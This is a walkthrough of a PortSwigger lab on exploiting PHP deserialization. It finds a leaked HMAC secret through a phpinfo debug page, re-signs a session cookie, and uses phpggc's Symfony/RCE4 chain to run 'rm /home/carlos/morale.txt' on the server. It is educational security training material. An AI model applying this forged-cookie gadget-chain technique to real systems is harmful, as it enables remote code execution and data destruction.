# Php Prebuilt Gadget chain

[Level description](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-exploiting-php-deserialization-with-a-pre-built-gadget-chain) - Practitioner


## The hack

The url decoded `session` cookie now stores a json object (pretty printed):

```json5
{
    "token": "......",
    "sig_hmac_sha1": "......"
}
```

The name of the signature field conveniently tells us it's a `hmac sha1` hash of the `token` field.

The level html page nicely leaves a comment in there, giving us access to secrets:

```html
<!-- <a href=/cgi-bin/phpinfo.php>Debug</a> -->
```

The `token` field is vulnerable to deserialization attacks.
The [`phpggc`](https://github.com/ambionics/phpggc) tool can
generate the exploit payload for us.


## Walk through

1. Login as `wiener`.

2. Bring up the dev console and switch to the `Application` tab.

3. Identify the `session` cookie. Its url decoded value is a json payload like this (pretty printed):

    ```json5
    {
        "token": "Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJ3MXh3NWtiZnZuM3I5azV5czJ4NW10YjlxcHd1ZGZwaSI7fQ==",
        "sig_hmac_sha1": "502d53d631377895e9735e7ac0af8036d47b7468"
    }
    ```

4. The signature field implies it's using the `hmac sha1` algorithm. But what's the `secret` for hashing it?

5. The HTML page of the site has a comment that gives us access to the configuration and environment variables:

    ```html
    <!-- <a href=/cgi-bin/phpinfo.php>Debug</a> -->
    ```

6. Visit the `href` path to find the `SECRET_KEY`. In my case it's `ca6wb1ub48e5jot69jxc9pvhtqxyg7k2`.

7. Test the secret key with the token, and verify that the signature computed from
`token` and `SECRET_KEY` matches `sig_hmac_sha1`:

    ```python
    import hmac
    import hashlib

    token = 'Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJ3MXh3NWtiZnZuM3I5azV5czJ4NW10YjlxcHd1ZGZwaSI7fQ=='
    secret = 'ca6wb1ub48e5jot69jxc9pvhtqxyg7k2'
    expected_sig = '502d53d631377895e9735e7ac0af8036d47b7468'

    sig = hmac.new(secret.encode(), token.encode(), hashlib.sha1).hexdigest()
    assert sig == expected_sig
    ```

8. Download [`phpggc`](https://github.com/ambionics/phpggc):

    ```shell
    $ git clone https://github.com/ambionics/phpggc.git /tmp/phpggc/
    ```

9. Use `phpgcc` to generate a payload to delete carlo's morale:

    ```shell
    $ /tmp/phpggc/phpggc Symfony/RCE4 exec 'rm /home/carlos/morale.txt' | base64
    ```

10. The generated token will be used in the `token` field.

11. Generate the signature using the method provided in step 7. The generated signature will be used in the `sig_hmac_sha1`.

12. Url encode the json exploit payload:

    ```json5
    {
        "token": "....",
        "sig_hmac_sha1": "...."
    }
    ```

13. Use the url encoded json payload in the `session` cookie, and visit the site.

14. *Carlo's morale is deleted*.
